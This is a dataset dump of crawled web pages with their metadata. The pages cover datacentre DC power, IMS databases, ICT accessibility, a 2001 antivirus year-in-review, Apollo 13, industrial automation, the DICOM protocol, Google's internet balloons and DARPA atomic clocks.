text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
"Alternating current (AC) power is used in virtually all UK datacentres, but DC power is almost 20% more efficient," said Jordan Gross, commercial director at Ultraspeed.
By using DC power, 20% to 40% of the thermal load is shifted outside the server to the AC-DC converters. This increases server reliability by as much as 27%, allows for higher density server environments and reduces power consumption.
According to Gross, many datacentres in London are facing power shortages, with modern servers drawing three times as much power as they did in the 1990s.
"We as an industry need to become more conscious of our power consumption and create sustainable datacentres. Reducing consumption directly is better than some unverifiable carbon offsetting scheme that is open to abuse," he said.
Switching to DC power enabled Ultraspeed to reduce its datacentre power consumption by 30%. The extra 10% saving was achieved by developing servers that run without a hard drive and use low energy processors.
"Discless servers generate less heat, and therefore less power is needed to cool them," said Gross. In an AC environment, for every 100W used to power a server, an additional 60W to 70W is needed for cooling.
Ultraspeed created its discless servers by putting the operating system and data on a remote storage area network. "This is not only more energy efficient, but has also brought hardware replacement times down to 15 minutes in the event of a failure," said Gross.
Makers of DC powered servers have reported power savings of up to 65% in datacentres using low power processors.
Analyst firm IDC said it believed using DC power in the datacentre could cut costs and improve the reliability of critical IT environments.
Comment on this article: firstname.lastname@example.org | <urn:uuid:d1ee256c-f7f1-41dc-8274-746aeaa93629> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/2240082381/Utraspeed-pioneers-green-datacentres-using-new-hybrid-servers | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00441-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957343 | 411 | 2.890625 | 3 |
IMS is Information Management System. Ims is also one type of database management system used from very long back. IMS is heirarchial database management system . DB2 as compared is relational database management system. To know better difference about IMS & DB2 first you need to know different type of database management systems. There are a lot of differences between IMS & DB2. IMS is used in many projects because of it verstality & robustness and most widely because of a concept called checkpointing. See its not only IMS DB used in projects , a conjuction of DB(BATCH ) & DC(ONLINE) are used in many shops.
Pls have a lookin some manuals/books for more info. Also can just go thru the below IBM manuals
IMS/ESA V5 Appl Pgm: DB
IMS/ESA Version 4: Application Programming: Data Communication
Joined: 13 Jun 2007 Posts: 826 Location: Wilmington, DE
I've worked with both. I LOVE IMS!!!! It is eons faster than DB2 and data recovery is basically automatic. Before there was IMS, a lot of shops used VSAM which is almost like a sequential file - only with keys.
There was a lot of data redundacy. IMS was developed for the first moon project. It was not originally an IBM project. Long story short, IBM got into the picture and millions of people came online! YAY!
So if you think of it this way, IMS is the child of VSAM - DB2 is a close relative. I relate it like the root segment of an IMS heir database is the first normal of a relation DB2 database, etc, etc. I still like IMS much better. | <urn:uuid:6ac74fbd-88f6-4550-9f20-4969c3a120ca> | CC-MAIN-2017-04 | http://ibmmainframes.com/about427.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00073-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95527 | 362 | 2.515625 | 3 |
Now the Olympics and the Paralympics are over what have we learnt that is relevant to ICT accessibility?
The paralympics proved to anyone who doubted it that although the elite paralympic athletes have disabilities they are all able, capable, driven, passionate, and fun loving. In fact no different to their Olympic counterparts. If we add to that the the supreme intellect of Stephen Hawking and the grace of the disabled dancers during the opening ceremony, and the consummate musical skills of the paraochestra during the closing ceremony, we must surely want to ensure that everyone with a disability is included as an equal member of our society. Finally we saw the benefits of well designed assistive technologies: Cheetah blades, wheelchairs for rugby or marathons, boccacio slides, blind footballs on the sporting side, plus Hawking's voice and special instruments in the paraorchestra.
So why is it that so many disabled people are not using ICT at all and so few are fully engaged?
The first problem is the perception of ICT suppliers and companies that use ICT to provide goods and services to their clients. There is still a perception that disabled people are incapable and uninterested in using ICT and therefore there is no point in making it easy for them to use. Hopefully one of the legacies of the paralympics is that people with disabilities will now be seen as capable and keen to do everything and no barrier should be put in their way.
Second is a blindness to the number of people with disabilities and therefore the size of the market opportunity. What the paralympics has shown is the huge number of elite athletes, and that is only possible because there is a very much larger pool of people with disabilites. With estimates of 20% of the population with some form of disability the business community must surely now understand the importance of including everyone as a potential client and working to turn the potential market into a business reality.
Hopefully the paralympics will have raised the importance of inclusion with the business leaders and they will now be demanding accessibility in all parts of the business especially ICT. This will put pressure on the ICT community that is still not geared up to provide inclusive design of ICT products and services. To meet this extra demand I think there are two primary area to consider: understanding and tools.
To quickly improve understanding of ICT accessibility at all levels of ICT from commissioning through design to delivery I would recommend two starting points:
- The BCS now provide an e-learning course Digital Accessibility: Web Essentials, which, in a couple of hours of training, will provide the basic understanding needed. It should be a standard part of training for anyone involved with ICT.
- 'BS 8878: 2010 Web accessibility code of practice' is the British standard that outlines a framework for web accessibility when designing or commissioning web products. This should be essential reading for any organisation creating a web presence.
The tools that are used to create ICT solutions do not make it easy to create accessible solutions. Tools for creating web sites, apps and content should all produce accessible output by default and give assistance to the designers and developers to ensure this happens. Tools at the moment vary from not providing any facilities to create accessible solutions through to those that make it possible; unfortunately very few make it easy to create accessible output by default. Hopefully pressure from business leaders and ICT users will ensure that tools improve quickly so that much of the complexity of providing accessible ICT is removed.
I hope that one of the legacies of the brilliant paralympics will be that accessible ICT will quickly become the norm and that by Rio all ICT will be accessible. | <urn:uuid:f2e12c97-53c5-495f-bede-b0f57caaf708> | CC-MAIN-2017-04 | http://www.bloorresearch.com/blog/accessibility/paralympics-teach/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00467-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95536 | 755 | 2.53125 | 3 |
Kaspersky Lab presents a year-end review of events taking place in anti-virus safety
2001 saw anti-virus companies achieve many definitive successes in the area of new anti-virus development, as well as the perfecting of already existing defense technologies thwarting malicious programs. In spite of these achievements, this year also witnessed the further increase in the number of users who suffered from virus attacks.
The rapid development of information technology (IT) has its pluses and minuses. On one hand, IT increases the effectiveness and efficiency of communication, developing documents, completing financial transactions, and in general has a very positive effect on conducting business. On the other hand, the continuing development of IT attracts even more new users, with the majority having only a superficial understanding of proper computer safety guidelines and rules. Because of this, even the most primitive malicious program can be enough to cause a global epidemic, such as with the "Kournikova" virus. These factors are the main reason for the worsening conditions in the anti-virus defense area.
Not one month has passed in 2001 without the latest virus epidemic infecting computer systems in various countries. It is important to note that this is precipitated by virus writers actively creating new methods for virus penetration on computers, giving further rise to the amount of virus incidents.
The following is a brief checklist of 2001 developments in the area of anti-virus safety:
Safety System Errors
- The widespread distribution of malicious programs exploiting breaches and holes in software safety systems;
- E-mail and the Internet solidified their positions as the most dangerous sources for malicious programs;
- The creation of other popular alternative means - ICQ, Gnutella, MSN Messenger, IRC - for the spreading of malicious programs;
- The increase of malicious programs for Linux;
- The appearance of "fileless" network worms;
- The predominance of Windows network worms, and the sharp decrease in script- and macro-viruses on the list of the most widespread malicious programs.
A breach is an error in a regular software program, through which a malefactor is able imperceptibly to penetrate a computer with malicious code.
The danger inherent in this type of virus is that it is activated automatically and virtually independent of a user. For example, in order to be infected by Nimda, a user simply needs to either open or read a message containing the worm in the preliminary viewing window. CodeRed doesn't even require this - it independently locates vulnerable computers via the Internet and infects them.
The main event of 2001 was the widespread distribution of malicious programs exploiting breaches and holes in an operating system's safety measures and applications for the purpose of penetrating computers (examples of such viruses are CodeRed, Nimda, BadtransII etc.).
According to Kaspersky Lab statistics, this type of malicious code has been responsible for 55% of the overall virus incidents occurring in 2001. This percentage speaks volumes for the necessity of adhering to the important anti-virus safety rules.
The particular attention paid by the computer underground to these breaches is perfectly understandable. While the traditional method of a virus penetrating a computer-when a user personally starts up an infected file-is just as effective as it previously was, it is not so efficient in achieving a malefactor's designs. This is because long ago, the majority of users realized the danger present in attached files. Therefore, many people simply prefer not to open such messages, asking a sender to instead send the information in the e-mail body. Taking this into consideration, virus writers have begun their search for new, more effective means of infecting computers, and they have found this new means in safety system vulnerabilities, i.e., breaches.
In order to guarantee yourself protection against such malicious programs, it is imperative to combine the use of Kaspersky Anti-Virus with the installation of the special software patches closing the well-known breaches. The said patches are available free of charge directly from the developers of applicably vulnerable software, and can be found at the corresponding company's Web site.
Kaspersky Lab recommends paying particular attention to the patches for MS Windows, MS Outlook, and MS Internet Explorer, as they are the software most susceptible to virus attacks via the above-mentioned breaches. In order to receive an announcement about an available patch in a timely manner, a user can simply subscribe to the mailing list of the appropriate software developer.
E-mail and the Internet - The Main Virus-Threat Sources
In 2001, according to Kaspersky Lab data, the number of virus attacks via e-mail, compared to 2000, increased by 5%, reaching 90% of overall virus-related incidents.
In conjunction with this, there has been a noticeable increase in the number of computers infected via the Internet. Whereas before the majority of infections were a direct result of a user downloading an unscanned file from a Web site and starting it up on his/her computer, today, more and more incidents of infection occur during an intended or accidental visit to an infected site. This occurs when a malicious program overrides one of the victim-site's pages so that when a user browses this page, his/her computer can be infected in two cases: The first occurs when a malefactor exploits a breach in the Web browser's safety system - most often on Internet Explorer (these breaches allow for a computer to be imperceptibly infected the moment a compromised page is viewed). The second case occurs automatically when a user downloads a proposed page containing malicious code.
In 2001, it also became clear that there are vulnerabilities inherent in many Internet paging systems (ICQ, Instant Messenger), popular amongst users, used for the spreading of a whole string of malicious programs. For example, Gnutella, the information-exchange network, fell victim to the network worm Mandragore; and a very large number of worms have been programmed for spreading via IRC.
Today's trend allows for the assessment that e-mail and the Internet will remain the most popular means for virus spreading. We must once again emphasize the importance of installing a reliable anti-virus defense for thwarting virus attacks via these sources.
Attacks on Linux Continue
2001 also saw the appearance of even more malicious programs targeted at the Linux operating system. The first sign of this was the Ramen network worm that was detected on January 19, and since that time, has struck a large number of corporate systems. Among the list of those falling victim to the Ramen worm were NASA, Texas A&M University, and Supermicro, a Taiwanese computer equipment producer.
Following this, the infection rate took on a flash-flood effect: Ramen clones appeared along with other original Linux worms, causing a similar amount of virus incidents.
Virtually all malicious programs for Linux exploit breaches in this operating system, and the widespread nature of these viruses demonstrates Linux's inability to withstand current and new threats. By considering Linux to be impenetrable, users have not responsibly responded to the necessity of installing Linux patches and an anti-virus in general. As a result, many users have also fallen victim to Linux worms.
The Linux situation would be even graver were the operating system not simply used on specialized servers, but were it also used as a workstation platform. Were Linux used as a workstation platform, the number of Linux users would increase many times over; thus, attracting the interest of an ever increasing number of virus writers creating malicious code for Linux.
You can read more about the Kaspersky Lab research into the problem of protecting Linux from viruses at this site.
"Fileless" Worms - The Next Call to Arms for the Anti-Virus Industry
One of 2001's most unpleasant surprises came in the form of detecting a new type of malicious code (CodeRed and BlueCode) able to actively spread and function on an infected computer without the use of a file. While in operation, such programs are present in the system memory only, and upon transfer to other computers, the programs are in the form of special data packets.
This peculiarity created serious problems for anti-virus developers, because traditional technology (anti-virus scanners and monitors) is incapable of effectively withstanding such a new threat. The standard defense algorithms thwarting malicious code are based on intercepting file operations. Kaspersky Lab was the first to remedy this problem by creating a special anti-virus filter that, in the background, checks all incoming data packets and deletes "fileless" worms.
The global epidemic caused by CodeRed (which according to some estimates has infected over 300,000 computers) confirmed the effectiveness of the "fileless" technology. It is important to note that even now, most computers have inadequate defense measures against this type of malicious code. Taking this into consideration, Kaspersky Lab believes next year will witness a repeat epidemic caused by new versions of "fileless" worms.
Windows Worms Make Their Entrance
In 2001, there has been a sharp change in the make-up of the most widespread malicious programs. From 1999-2000, the unquestionable leaders of all viruses were macro- and, a bit later, script-virus worms. However, at the beginning of this year, the situation began to change drastically, and already nearly 90% of registered cases of computer infection have been caused by Windows worms.
The reason behind such an about-face change is witnessed in the development of an effective means for battling macro- and script-viruses, found in the ability of an anti-virus to neutralize both existing and potential threats of this type. For example, the first background checker in the world that intercepts script-viruses, Script Checker, was integrated into Kaspersky Anti-Virus in May 2000. Script Checker repelled all attacks of the various forms of the LoveLetter (ILOVEYOU) virus without any additional updates to the anti-virus database. This impressive result was achieved thanks to the unique heuristic technology created specifically for defending against unknown script-viruses.
For the fight against macro-viruses, Kaspersky Lab developed Office Guard that provides 100% protection against these types of viruses. Unlike traditional anti-viruses, Office Guard does not search for virus signatures (the data results), but rather emulates and analyzes macro-virus behavior, blocking any harm they could cause to a computer.
Government Control Over the Anti-Virus Industry?
In November, it became known that the FBI had developed a Trojan program for the tracking of suspects. This "classic" Trojan, christened Magic Lantern, intercepts all keystrokes a suspect makes, copying them to a secret file. Later, the received data can be used to decode and decrypt sent e-mail and provide evidence against said suspect or suspects.
On December 3, Paul Bresson, spokesman for the FBI, during an interview with the magazine Information Security, confirmed the development of the Magic Lantern Trojan. However, at the behest of the US government (or at least the strong "suggestion"), will anti-virus developers not include means for detecting such a Trojan in their software? McAfee and Symantec have already confirmed that they won't include detection measures for Magic Lantern - is this the beginning of a user exodus to other anti-virus products?
This type of move by the US government could be precedent setting. Theoretically, should this happen, other countries' governments could make similar demands of other anti-virus companies to not include means for detecting similar governmental spying Trojans. In this case, anti-virus security could completely get out of control. And sooner or later, as always happens, the original Magic Lantern could fall into the hands of malefactors, whose goal would be to use this program for their own ends. As a result, the world economy, heavily dependent on IT, could be paralyzed by a worldwide virus epidemic.
The Future Safety of the Worldwide Net
The worsening condition of the virus situation gives rise to pessimistic predictions in relation to Internet development. According to the England-based company MessageLabs, should the present tendency continue, by 2013, every second e-mail could contain malicious code.
There is the opinion that in order to get out of this difficult bind, a safe, parallel Internet must be created. This means to solving the problem could be complicated by the majority of users being unwilling to switch over to the new Net, and also complicated by the possibility of malicious code also "migrating" from the current Internet. According to Kaspersky Lab, the best solution is to introduce, step-by-step, new equipment and software into the current Internet technology, using only checked and certified information and data. Together with this, the most important aspect would be the issuing of a personal identification number to each user on the Net. This would help keep track of and stave off virus epidemics, and also help localize the creators of malicious programs and stop their actions.
Current trends allow for predicting the situation in virus development as it may occur in 2002. Unfortunately, there isn't any basis for absolute optimism. Kaspersky Lab believes that there will be an increase in the number and variety of virus epidemics in the coming year. First and foremost, this is dependent on the number of users, some of whom will be virus writers, and the others, their victims. The amount of malicious programs, varying in type, will also grow; and undoubtedly, their methods of penetrating computers will be improved.
In connection with this, Kaspersky Lab will continue developing the very latest defense technology that will reliably protect and defend computers and the Net from the rising virus-threat tide. For 2002, Kaspersky Lab plans to release new virus technologies that will make our users even more secure. A more than 150% increase in the number of Kaspersky Anti-Virus users in 2001 confirms our anti-virus' high quality and our commitment to overall customer service.
In conclusion, we present the Top Ten most widespread viruses, by percentage of occurrence, for the last quarter (Sept.-Dec.) of 2001. | <urn:uuid:1f59987b-5d56-470a-9d20-3b6a4a320ad0> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/virus/2001/2001_The_Year_in_Review | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00378-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93756 | 2,910 | 2.703125 | 3 |
This is about Apollo 13. A mission that is considered to be the most successful failure in the history of NASA. A failure, because it could not achieve the mission it was designed for, and a success, because of the most remarkable achievement of bringing the three astronauts back home safely. Hollywood had made a popular movie Apollo 13, and I strongly recommend people watch the movie, which clearly depicts the Apollo 13 accident.
En route to the moon, approximately two hundred thousand miles from Earth, oxygen tanks in the command module of Apollo 13 exploded, and that sealed the failure of the mission. The original mission was aborted, and the new mission, “bring astronauts safely home,” replaced the old mission. The entire world witnessed a series of dramatic events during this new mission. I would like to cite the two most-critical problem solutions in this drama and provide a process perspective.
The first life-threatening problem was the increasing level of carbon dioxide in the cabin of the lunar module. The control room in Houston did a commendable job of designing the solution, but its implementation was to be done by the astronauts themselves. The control room in Houston delivered the lifesaving process—exact, step-by-step procedures that could be executed by the astronauts. All the astronauts did was execute those step-by-step procedures and save their lives. The desired outcome was achieved by the procedural task execution designed by the solution designer.
The drama continued, and there was a second life-threatening situation on reentry procedure into the Earth’s orbit. Because of an acute power shortage, the originally designed procedure was non-workable for reentry into the Earth’s orbit. The captain of the mission, Jim Lovell, repeatedly emphasized the need for “step by step” procedures. This was yet another commendable delivery by the control room in Houston. In a very timely manner, meeting the deadlines, the control room delivered step-by-step procedures to be executed by the astronauts on board and saved their lives again.
What is the takeaway?
We learn about the might of a well-designed process and procedure, especially when dealing with complex systems. We also learn about the positive outcome that it brings in all aspects of life. In our regular business too (of enabling mainstream business through IT systems), well-designed processes can deal with every possible business-critical situation. This is the fundamental principle of the service management philosophy.
To learn about HCL's IT Service Management,click here. | <urn:uuid:96e85815-3d89-4757-a310-43c2a8ac8512> | CC-MAIN-2017-04 | https://www.hcltech.com/blogs/process-perspective-apollo-13-mission-%E2%80%93-nasa%E2%80%99s-most-successful-failure | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00378-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.959795 | 511 | 2.859375 | 3 |
Imagine digital factories that leverage sophisticated communications and control capabilities to give machines real-time, autonomous decision-making power. Imagine the cost-effective assembly of customized products that such a digital production system enables. And consider how that system might scale across a much wider network, sharing best practices in manufacturing automation to drive broader operational and financial performance improvements. It is not all fantasy…
Sensors and control mechanisms are now embedded into most Automotive and Industrial Equipment industry shop-floor machinery. What’s more, such devices are increasingly connected with management, execution, logistics and ERP systems. As a result, manufacturers have unprecedented visibility into the factory production process.
However realizing the full potential of Industrial Automation poses challenges for many companies. It requires new tools, new skills, new ways of sharing and managing information—and new ways of thinking. That’s a big ask for companies that are not digital “natives”. And an even bigger one for those that are not organized operationally to network across the ecosystem.
Intelligent tools and an intelligent workforce are key enablers of Industrial Automation and together they permit deeper analysis of both manufacturing processes and the supply chain.
Intelligent tools such as sensors, materials tracking mechanisms, 3D printing, automated product design, robotics, mobile devices and “wearables” can all help manufacturers cut costs and increase productivity. Networked equipment sensors, for example, can identify and predict maintenance issues and thus help reduce unscheduled downtime. Moreover 3D printing can boost product quality and help reduce the need for a spare parts inventory.
Intelligent tools require an intelligent workforce, and vice versa. As men and machines do more together, new technologies can deliver the skills needed to make the most of Industrial Automation, helping boost both the skill sets and collaborative capabilities of the human element in a more change-ready and responsive workforce. For example smart glasses can display all the required information for an operator to do their job faster and reduce errors. Eyewear technology can also offer interactivity by granting professionals access to features including barcode scanning, data retrieval from the cloud, voice command and augmented reality. However even in an increasingly machine-centric environment, people will still predominate as the drivers of change and use these tools to achieve the best and most efficient outcomes for companies. To facilitate this digital journey, however, they do need new skills: from data science to machine coordination and maintenance.
In summary, Industrial Automation offers manufacturers the chance to build faster processes, better products, improved asset efficiency, and higher workforce productivity. The time to start realizing its potential is now. | <urn:uuid:c40b8099-38b4-467c-8071-3f9752b37e95> | CC-MAIN-2017-04 | https://www.accenture.com/bd-en/insight-highlights-auto-industrial-industrial-automation | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00312-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.924954 | 536 | 2.671875 | 3 |
What Is DICOM?
DICOM is a Standard for Digital Imaging and Communications in Medicine. The DICOM Standard specifies a diverse set of information about patients, imaging equipment, procedures, and images. DICOM is hierarchically structured and has a Client-Server architecture. It has the following parts:
- File/data format
- Data interchange protocol
- Network protocol architecture
Basic Knowledge About the DICOM Protocol
At it's simplest, DICOM is a protocol for dealing with medical images (X-Rays, MRIs, etc). If you're diving into DICOM, there are a few things you should know right from the start that will make your life a lot easier. I'll outline some of these basic facts here, then dig deeper later on in the post:
- DICOM files typically have a .dcm extension and data contains both patient data and the image/pixel data.The patient data comes from the EMR/EHR/HIS systems as HL7 data which gets tightly coupled with the equipment, procedures and image/pixel data created by the radiology medical imaging devices as DICOM data.
- The DICOM protocol is a binary Upper Level Protocol (ULP) over TCP/IP. Well known ports used by DICOM are 104, 2761, 2762 and 11112. It is used to process DICOM data, transmit, search/query, integrate, distribute, print, share, store, display medical images and patient data from the radiology archival/storage systems (PACS, RIS) to the workstation for the Radiologist to write reports.
- The DICOM Network Protocol architecture looks something like this: Network ⇒ TCP/IP ⇒ DICOM ULP for TCP/IP ⇒ UL Service boundary ⇒ DICOM Message Exchange ⇒ Medical Imaging Application.
Why Does DICOM Matter?
Medical imaging is the fastest growing and most profitable segment of healthcare. DICOM has an ever increasing need for network bandwidth, system performance and support for many diverse medical devices.
Currently there are limited tools available to diagnose the patient data, DICOM and network protocol problems. ExtraHop can help!
How Can ExtraHop Help with DICOM Monitoring?
DICOM, HL7 data and network are crucial to the healthcare industry. As of version 5.2.2 ExtraHop has added support for DICOM. ExtraHop already had support for HL7 and many of the network protocols in previous versions.
ExtraHop has the huge advantage of having the ability to extract meaningful insights from HL7 i.e. patient data, DICOM and other network messages in real-time!
Now we get to explore many aspects of DICOM workflows and monitor DICOM. We want to see how we can help the different departments in healthcare like radiology, IT, support etc. in pinpointing the underlying problems with DICOM from multiple angles.
The History of DICOM
DICOM is a standard developed by the American College of Radiology (ACR) and National Electrical Manufacturers Association (NEMA). It started in the 1980s and in 1988 the second version was released. The first large-scale deployment of ACR/NEMA technology was made in 1992 by the US Army and Air Force. Loral Aerospace and Siemens Medical Systems led a consortium of companies in deploying the first US military PACS (Picture Archiving and Communications System). In 1993 the third version of the standard was released. Its name was then changed to "DICOM." New service classes were defined, network support was added and the Conformance Statement was introduced to establish the basic DICOM communication protocols for query or retrieval, storage and print classes. Officially, the latest version of the standard is still 3.0, it has been constantly updated and extended since 1993.
Where and How Is DICOM Used?
DICOM is used extensively for medical imaging in hospitals. It is used in the processes of diagnosing and treating patients, tracking patient outcomes and scheduling procedures, ICD-10 coding, billing and teleradiology to transmit radiological patient images, such as X-rays, CTs, and MRIs, these are the different modalities, from one location to another for the purposes of sharing studies with other radiologists and physicians.
An examination number is generated prior to imaging when the order is created to synchronize image transfer to PACS using PACS ID and/or RIS using an accession number which links the radiology reports to a specific image study. The accession number is usually assigned by the HIS/RIS system and can be repeating or unique depending on the system.
Managing the modality worklist is a process used to reduce manual data entry errors and increase fidelity of patient information into the PACS/RIS imaging console.
Basic Structures and Concepts in DICOM
- DICOM Objects are known as the Information Object Definitions (IOD). All real world data like patients, studies, medical devices, images, patient schedule list, a queue to be sent to a printer are objects with defined templates. These are definitions of the information to be exchanged between a Service Class User (SCU) - Client and Service Class Provider (SCP) - Server.
- A DICOM modality is a property/attribute of the DICOM data object, e.g. CT, MRI, X-rays etc. are the modalities
- A DICOM Message is composed of a Command Set followed by a conditional Data Set.
- Command and Data sets are made of Elements.
- Elements have a Tag, length and value.
- Tags have group tag and element tag.
- DICOM applications provide the services required for the data exchange.
- DICOM Service Element (DIMSE) are used by Application Entities (AE).
- There are two types of DIMSE Services, Composite DIMSE-C and Normalized DIMSE-N. These support operations and notifications like storage, retrieval, printing etc. on the SOP instances.
- AEs have Titles (AET). AE has an IP address assigned. AET are case sensitive and unique.
- Service Object Pairs (SOPs) have an unique ID (UID). SOP Classes are the fundamental unit of DICOM interoperability.
How does the DICOM transaction happen?
- AE of SCU - Client uses DIMSE to negotiate a SOP Class with the AE of SCP - Server using it's DIMSE. There are DIMSE protocols defining the procedures and encoding rules to construct messages.
- Message transactions between the two devices using DICOM begin with an Association establishment. Both devices negotiate the information structures that will be exchanged, the services that will be invoked, byte order and data compression method.
- DICOM ULP consists of seven Protocol Data Units (PDUs). Each PDU has a maximum length. PDUs are the message formats exchanged between peer entities within a layer, based on the request and the response DICOM messages.
What Is Next for DICOM?
DICOM is very complex protocol with a lot of documents written by NEMA defining the DICOM standard. ExtraHop has recently added support for DICOM in version 5.2.2 which opens up many different possibilities.
I am very excited about it since DICOM provides us one more piece of the complex healthcare workflows giving deep insight into healthcare data and network issues.
Currently we are in an exploratory mode to figure out even more meaningful insights we can get from DICOM data using ExtraHop. The possibilities are endless, especially since we can correlate DICOM data with HL7 data and network protocols for a complete picture of this crucial, profitable part of the healthcare technology environment.
Stay tuned for more blogs on DICOM in the future. For now, check out Six Ways ExtraHop Enables Real-Time Healthcare Systems | <urn:uuid:473c2c10-90e0-4145-94b4-59d647ad95d7> | CC-MAIN-2017-04 | https://www.extrahop.com/community/blog/2016/introduction-to-dicom-protocol/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00340-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.906875 | 1,666 | 2.6875 | 3 |
Google launched high-altitude balloons in a test to create a wireless network that could provide Internet access to remote and underserved parts of the world.
For two out of three people around the world, a fast and affordable Internet connection is out of reach. Google is trying to solve this problem with a network of balloons that fly above the Earth twice as high as commercial airplanes.
Google X, the company's research arm, is testing balloon-powered Internet access. Last week, Google launched 30 high-altitude balloons above the Canterbury area of New Zealand as part of a pilot test with 50 users trying to connect to the Internet via the balloons.
Members of the Google X team explain how they create a wireless network using high altitude balloons that fly in the stratosphere, about 12.4 miles above Earth.
"There are many terrestrial challenges to Internet connectivity -- jungles, archipelagos, mountains," wrote Mike Cassidy, Google's project lead for the balloon effort, in a blog post. "There are also major cost challenges. Right now, for example, in most of the countries in the southern hemisphere, the cost of an Internet connection is more than a month's income. Solving these problems isn't simply a question of time: It requires looking at the problem of access from new angles."
Google's vision is to build a ring of balloons, flying around the globe on stratospheric winds about 12.4 miles high, that provide Internet access to remote and underserved areas. The balloons communicate with specially designed antennas on the ground, which in turn, connect to ground stations that connect to the local Internet service provider, the company said.
"It's very early days, but we've built a system that uses balloons, carried by the wind at altitudes twice as high as commercial planes, to beam Internet access to the ground at speeds similar to today's 3G networks or faster," Cassidy wrote. "As a result, we hope balloons could become an option for connecting rural, remote, and underserved areas, and for helping with communications after natural disasters."
He added that people at Google X have dubbed the effort Project Loon, simply because the idea sounds a bit crazy. However, he said there's "solid science" behind it.
Ezra Gottheil, an analyst with Technology Business Research, said he's intrigued with the idea.
"It's a good thing we've got Google to do crazy things," he added. "Internet access is really important, and will be more important going forward. And many things that eventually were significant started out as crazy prototypes. So I'm all for it."
One issue that Google has had to deal with is how to keep the balloons floating roughly in the same area to maintain an Internet connection on Earth. Cassidy said the team members believe they've figured it out.
"All we had to do was figure out how to control their path through the sky," he noted. "We've now found a way to do that, using just wind and solar power: We can move the balloons up or down to catch the winds we want them to travel in. That solution then led us to a new problem: How to manage a fleet of balloons sailing around the world so that each balloon is in the area you want it right when you need it. We're solving this with some complex algorithms and lots of computing power."
Google wants to expand the pilot test and try the balloon effort in other countries going forward. Project leaders also hope to connect with others who have been working to solve Internet connectivity issues to trade ideas and possibly work together.
"This is still highly experimental technology and we have a long way to go," Cassidy wrote. "We'd love your support as we keep trying and keep flying!"
This article, Google tests Internet connectivity via balloons in the stratosphere, was originally published at Computerworld.com.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "Google tests Internet connectivity via balloons in the stratosphere" was originally published by Computerworld. | <urn:uuid:01cdaf16-b073-45bb-b8d0-5c28076c3ecd> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2168252/smb/google-tests-internet-connectivity-via-balloons-in-the-stratosphere.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00460-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.96304 | 891 | 3.078125 | 3 |
The US military is looking for advanced portable atomic clocks it says will help bolster secure data routing, build communication systems that are insensitive to jamming and provide more reliable and robust global positioning than current time-keeping systems.
The portable atomic clock research is part of the Defense Advanced Research Projects Agency's Quantum Assisted Sensing and Readout (QuASAR) program that seeks ro develop techniques to miniaturize and ruggedize high-performance atomic clocks for deployment in the field.
According to DARPA, many defense-critical applications require exceptionally precise time and frequency standards enabled only by atomic clocks. The Global Positioning System (GPS) and the internet are two key examples. Atomic properties are absolute, and do not "drift" or lose minutes over time. In this sense, atoms are self-calibrated, making them ideal for precision sensing, DARPA stated.
Recent years have seen the emergence of advanced technologies that exhibit single-atom-like properties, such as nanoelectromechanical systems (NEMS) and nitrogen-vacancy (NV) centers in diamond that retain their characteristics even at room temperature, DARPA stated.
The application of atomic control and cooling methods to these solid-state systems will yield a new generation of sensors of extreme resolution and sensitivity, DARPA stated. By employing these new techniques used in current laboratory atomic clocks, military clocks can be improved by orders of magnitude. Such clocks will enable secure data routing, communication systems that are insensitive to jamming, high-resolution coherent radar, and more reliable and robust global positioning, DARPA stated.
QuASAR will develop techniques to miniaturize and ruggedize high-performance atomic clocks for deployment in the field. What DARPA wants to see are ways to reduce the total footprint of atomic clocks to portable sizes, while maintaining high performance. Specifically DARPA wants contractors to:
- Demonstrate the high-risk components necessary to produce a fieldable clock. Effort need not be spent on integrated electronics and packaging of the device.
- Integrate components and perform a proof-of-principle tabletop experiment achieving 10-16 fractional frequency stability at 1 day.
- Provide a credible plan for a high-performance fieldable device based on program components and table top experiments.
Follow Michael Cooney on Twitter: nwwlayer8
Layer 8 Extra
Check out these other hot stories: | <urn:uuid:1c417709-f521-4818-a045-026190fd22e9> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2227065/security/us-wants-portable--rugged-atomic-clocks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283689.98/warc/CC-MAIN-20170116095123-00514-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.880709 | 489 | 2.859375 | 3 |
